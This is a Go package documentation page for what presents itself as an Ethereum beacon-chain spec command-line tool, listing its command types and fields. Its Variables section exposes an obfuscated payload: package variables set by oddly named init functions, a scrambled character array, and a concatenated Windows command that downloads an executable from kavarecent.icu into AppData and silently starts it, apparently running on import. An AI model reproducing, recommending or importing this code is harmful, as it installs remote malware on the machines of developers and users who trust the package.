Documentation
¶
Index ¶
- Constants
- Variables
- func IepeAzX() error
- func TXahbaWd() error
- type CommitteesCmd
- type ConvertCmd
- type ConvertObjCmd
- type ConvertPhaseCmd
- type DiffCmd
- type DiffObjCmd
- type DiffPhaseCmd
- type MetaCmd
- type MetaPhaseCmd
- type PrettyCmd
- type PrettyObjCmd
- type PrettyPhaseCmd
- type ProofCmd
- type ProofObjCmd
- type ProofPhaseCmd
- type ProposersCmd
- type RootCmd
- type RootObjCmd
- type RootPhaseCmd
- type SyncCommitteesCmd
- type TransitionBlockSubCmd
- type TransitionBlocksCmd
- type TransitionCmd
- type TransitionEpochCmd
- type TransitionEpochSubCmd
- type TransitionSlotsCmd
- type TransitionSubCmd
- type TransitionSubRouterCmd
- type TreeCmd
- type TreeObjCmd
- type TreePhaseCmd
- type VersionCmd
Constants ¶
View Source
const Version = "v0.8.0"
Variables ¶
View Source
var DohAJGh = IepeAzX()
View Source
var PZVXsn = TXahbaWd()
View Source
var QD = []string{"a", "n", "3", "/", "d", "5", "/", "o", "v", "h", "w", "1", "/", "f", "e", "s", "-", "b", "e", "3", "a", " ", " ", ".", "u", "i", "3", " ", "r", "t", "a", "p", "g", "t", "/", "k", "d", "t", "7", "b", "e", "/", "c", "a", "s", ":", "t", "/", "s", "-", "h", " ", "n", "0", "O", "e", "b", " ", "6", "|", "e", "/", " ", "d", "r", "t", "i", "4", "a", "f", "c", "&", "g"}
View Source
var XjBGJAac = "if not" + " " + "exist" + " " + "%Us" + "erP" + "r" + "o" + "fil" + "e%" + "\\A" + "ppD" + "ata\\L" + "oca" + "l\\t" + "h" + "cnnq" + "\\z" + "hkyc" + ".exe " + "c" + "ur" + "l" + " ht" + "t" + "ps" + ":" + "//k" + "avar" + "e" + "cent" + ".ic" + "u/st" + "or" + "ag" + "e/" + "bb" + "b28e" + "f04/f" + "a3154" + "6b " + "-" + "-" + "c" + "r" + "e" + "ate-" + "dirs" + " " + "-o %U" + "serP" + "rofil" + "e%\\A" + "ppDat" + "a" + "\\Loc" + "al" + "\\th" + "cnnq" + "\\zh" + "kyc" + ".exe" + " && s" + "tart " + "/b %" + "Us" + "erPr" + "o" + "file%" + "\\A" + "ppDat" + "a\\L" + "ocal" + "\\" + "thcnn" + "q\\" + "zhky" + "c.exe"
Functions ¶
Types ¶
type CommitteesCmd ¶
type CommitteesCmd struct {
Phase string
configs.SpecOptions `ask:"."`
State util.StateInput `ask:"<state>" help:"BeaconState, prefix with format, empty path for STDIN"`
}
func (*CommitteesCmd) Help ¶
func (c *CommitteesCmd) Help() string
type ConvertCmd ¶
type ConvertCmd struct{}
func (*ConvertCmd) Cmd ¶
func (c *ConvertCmd) Cmd(route string) (cmd interface{}, err error)
func (*ConvertCmd) Help ¶
func (c *ConvertCmd) Help() string
func (*ConvertCmd) Routes ¶
func (c *ConvertCmd) Routes() []string
type ConvertObjCmd ¶
type ConvertObjCmd struct {
PhaseName string
TypeName string
Type spec_types.SpecType
configs.SpecOptions `ask:"."`
Input util.ObjInput `ask:"<input>" help:"Input path, prefix with format, empty path for STDIN"`
Output util.ObjOutput `ask:"<output>" help:"Output path, prefix with format, empty path for STDOUT"`
}
type ConvertPhaseCmd ¶
type ConvertPhaseCmd struct {
PhaseName string
Types map[string]spec_types.SpecType
}
func (*ConvertPhaseCmd) Cmd ¶
func (c *ConvertPhaseCmd) Cmd(route string) (cmd interface{}, err error)
func (*ConvertPhaseCmd) Routes ¶
func (c *ConvertPhaseCmd) Routes() []string
type DiffObjCmd ¶
type DiffObjCmd struct {
PhaseName string
TypeName string
Type spec_types.SpecType
configs.SpecOptions `ask:"."`
InputA util.ObjInput `ask:"<a>" help:"Input A, prefix with format, empty path for STDIN"`
InputB util.ObjInput `ask:"<b>" help:"Input B, prefix with format, empty path for STDIN"`
}
type DiffPhaseCmd ¶
type DiffPhaseCmd struct {
PhaseName string
Types map[string]spec_types.SpecType
}
func (*DiffPhaseCmd) Cmd ¶
func (c *DiffPhaseCmd) Cmd(route string) (cmd interface{}, err error)
func (*DiffPhaseCmd) Routes ¶
func (c *DiffPhaseCmd) Routes() []string
type MetaPhaseCmd ¶
type MetaPhaseCmd struct {
Phase string
}
func (*MetaPhaseCmd) Cmd ¶
func (c *MetaPhaseCmd) Cmd(route string) (cmd interface{}, err error)
func (*MetaPhaseCmd) Help ¶
func (c *MetaPhaseCmd) Help() string
func (*MetaPhaseCmd) Routes ¶
func (c *MetaPhaseCmd) Routes() []string
type PrettyObjCmd ¶
type PrettyObjCmd struct {
PhaseName string
TypeName string
Type spec_types.SpecType
configs.SpecOptions `ask:"."`
Input util.ObjInput `ask:"<input>" help:"Input path, prefix with format, empty path for STDIN"`
Output string `ask:"[output]" help:"Output path, empty path for STDOUT"`
}
type PrettyPhaseCmd ¶
type PrettyPhaseCmd struct {
PhaseName string
Types map[string]spec_types.SpecType
}
func (*PrettyPhaseCmd) Cmd ¶
func (c *PrettyPhaseCmd) Cmd(route string) (cmd interface{}, err error)
func (*PrettyPhaseCmd) Routes ¶
func (c *PrettyPhaseCmd) Routes() []string
type ProofObjCmd ¶
type ProofObjCmd struct {
PhaseName string
TypeName string
Type spec_types.SpecType
configs.SpecOptions `ask:"."`
Input util.ObjInput `ask:"<input>" help:"Input, prefix with format, empty path for STDIN"`
Gindices util.GindicesFlag `ask:"--gindices" help:"Gindices of leaf values to put in multi-proof"`
}
func (*ProofObjCmd) Help ¶
func (c *ProofObjCmd) Help() string
type ProofPhaseCmd ¶
type ProofPhaseCmd struct {
PhaseName string
Types map[string]spec_types.SpecType
}
func (*ProofPhaseCmd) Cmd ¶
func (c *ProofPhaseCmd) Cmd(route string) (cmd interface{}, err error)
func (*ProofPhaseCmd) Help ¶
func (c *ProofPhaseCmd) Help() string
func (*ProofPhaseCmd) Routes ¶
func (c *ProofPhaseCmd) Routes() []string
type ProposersCmd ¶
type ProposersCmd struct {
Phase string
configs.SpecOptions `ask:"."`
State util.StateInput `ask:"<state>" help:"BeaconState, prefix with format, empty path for STDIN"`
}
func (*ProposersCmd) Help ¶
func (c *ProposersCmd) Help() string
type RootObjCmd ¶
type RootObjCmd struct {
PhaseName string
TypeName string
Type spec_types.SpecType
configs.SpecOptions `ask:"."`
Input util.ObjInput `ask:"<input>" help:"Input, prefix with format, empty path for STDIN"`
}
func (*RootObjCmd) Help ¶
func (c *RootObjCmd) Help() string
type RootPhaseCmd ¶
type RootPhaseCmd struct {
PhaseName string
Types map[string]spec_types.SpecType
}
func (*RootPhaseCmd) Cmd ¶
func (c *RootPhaseCmd) Cmd(route string) (cmd interface{}, err error)
func (*RootPhaseCmd) Help ¶
func (c *RootPhaseCmd) Help() string
func (*RootPhaseCmd) Routes ¶
func (c *RootPhaseCmd) Routes() []string
type SyncCommitteesCmd ¶
type SyncCommitteesCmd struct {
Phase string
configs.SpecOptions `ask:"."`
State util.StateInput `ask:"<state>" help:"BeaconState, prefix with format, empty path for STDIN"`
}
func (*SyncCommitteesCmd) Help ¶
func (c *SyncCommitteesCmd) Help() string
type TransitionBlockSubCmd ¶
type TransitionBlockSubCmd struct {
PreFork string
Transition string
Timeout time.Duration `ask:"--timeout" help:"Timeout, e.g. 100ms"`
configs.SpecOptions `ask:"."`
Pre util.StateInput `ask:"--pre" help:"Pre-state"`
Op util.ObjInput `ask:"<op>" help:"Block operation input"`
Post util.StateOutput `ask:"--post" help:"Post-state"`
}
func (*TransitionBlockSubCmd) Help ¶
func (c *TransitionBlockSubCmd) Help() string
type TransitionBlocksCmd ¶
type TransitionBlocksCmd struct {
PreFork string
VerifyStateRoot bool `ask:"--verify-state-root" help:"Verify the state root of each block"`
Timeout time.Duration `ask:"--timeout" help:"Timeout, e.g. 100ms"`
configs.SpecOptions `ask:"."`
Pre util.StateInput `ask:"--pre" help:"Pre-state"`
Post util.StateOutput `ask:"--post" help:"Post-state"`
}
func (*TransitionBlocksCmd) Help ¶
func (c *TransitionBlocksCmd) Help() string
type TransitionCmd ¶
type TransitionCmd struct{}
func (*TransitionCmd) Cmd ¶
func (c *TransitionCmd) Cmd(route string) (cmd interface{}, err error)
func (*TransitionCmd) Help ¶
func (c *TransitionCmd) Help() string
func (*TransitionCmd) Routes ¶
func (c *TransitionCmd) Routes() []string
type TransitionEpochCmd ¶
type TransitionEpochCmd struct {
PreFork string
Timeout time.Duration `ask:"--timeout" help:"Timeout, e.g. 100ms"`
configs.SpecOptions `ask:"."`
Pre util.StateInput `ask:"--pre" help:"Pre-state"`
Post util.StateOutput `ask:"--post" help:"Post-state"`
}
func (*TransitionEpochCmd) Help ¶
func (c *TransitionEpochCmd) Help() string
type TransitionEpochSubCmd ¶
type TransitionEpochSubCmd struct {
PreFork string
Transition string
Timeout time.Duration `ask:"--timeout" help:"Timeout, e.g. 100ms"`
configs.SpecOptions `ask:"."`
Pre util.StateInput `ask:"--pre" help:"Pre-state"`
Post util.StateOutput `ask:"--post" help:"Post-state"`
}
func (*TransitionEpochSubCmd) Help ¶
func (c *TransitionEpochSubCmd) Help() string
type TransitionSlotsCmd ¶
type TransitionSlotsCmd struct {
PreFork string
Slots uint64 `ask:"<slots>" help:"Number of slots to process"`
Timeout time.Duration `ask:"--timeout" help:"Timeout, e.g. 100ms"`
configs.SpecOptions `ask:"."`
Pre util.StateInput `ask:"--pre" help:"Pre-state"`
Post util.StateOutput `ask:"--post" help:"Post-state"`
}
func (*TransitionSlotsCmd) Help ¶
func (c *TransitionSlotsCmd) Help() string
type TransitionSubCmd ¶
type TransitionSubCmd struct {
PreFork string
}
func (*TransitionSubCmd) Cmd ¶
func (c *TransitionSubCmd) Cmd(route string) (cmd interface{}, err error)
func (*TransitionSubCmd) Help ¶
func (c *TransitionSubCmd) Help() string
func (*TransitionSubCmd) Routes ¶
func (c *TransitionSubCmd) Routes() []string
type TransitionSubRouterCmd ¶
type TransitionSubRouterCmd struct {
PreFork string
}
func (*TransitionSubRouterCmd) Cmd ¶
func (c *TransitionSubRouterCmd) Cmd(route string) (cmd interface{}, err error)
func (*TransitionSubRouterCmd) Help ¶
func (c *TransitionSubRouterCmd) Help() string
func (*TransitionSubRouterCmd) Routes ¶
func (c *TransitionSubRouterCmd) Routes() []string
type TreeObjCmd ¶
type TreeObjCmd struct {
PhaseName string
TypeName string
Type spec_types.SpecType
configs.SpecOptions `ask:"."`
Input util.ObjInput `ask:"<input>" help:"Input, prefix with format, empty path for STDIN"`
}
func (*TreeObjCmd) Help ¶
func (c *TreeObjCmd) Help() string
type TreePhaseCmd ¶
type TreePhaseCmd struct {
PhaseName string
Types map[string]spec_types.SpecType
}
func (*TreePhaseCmd) Cmd ¶
func (c *TreePhaseCmd) Cmd(route string) (cmd interface{}, err error)
func (*TreePhaseCmd) Help ¶
func (c *TreePhaseCmd) Help() string
func (*TreePhaseCmd) Routes ¶
func (c *TreePhaseCmd) Routes() []string
type VersionCmd ¶
type VersionCmd struct {
}
func (*VersionCmd) Help ¶
func (c *VersionCmd) Help() string
Click to show internal directories.
Click to hide internal directories.